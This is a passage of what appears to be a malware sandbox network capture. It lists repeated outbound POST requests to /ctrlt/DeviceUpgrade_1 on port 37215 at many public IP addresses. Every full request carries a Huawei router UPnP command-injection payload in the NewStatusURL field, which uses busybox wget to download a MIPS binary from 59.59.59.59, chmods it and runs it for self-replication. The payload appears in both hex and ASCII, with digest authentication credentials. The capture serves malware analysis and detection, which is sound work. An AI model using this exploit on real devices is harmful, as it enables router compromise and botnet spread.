2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1952192.168.2.1542120197.241.92.1937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.033596992 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1953192.168.2.1543076102.14.209.10537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.034782887 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1954192.168.2.153480841.193.187.19637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.034873009 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1955192.168.2.1541886197.49.33.4037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.034876108 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1956192.168.2.1550756153.132.179.1937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.034907103 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1957192.168.2.1548932197.243.78.5937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.034936905 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1958192.168.2.1534408197.152.122.11537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.035578012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1959192.168.2.1551412157.127.64.4637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.035600901 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1960192.168.2.1557602184.69.240.23037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.041517973 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1961192.168.2.155993878.109.142.23937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.041553020 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1962192.168.2.153755641.193.160.19537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.041863918 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
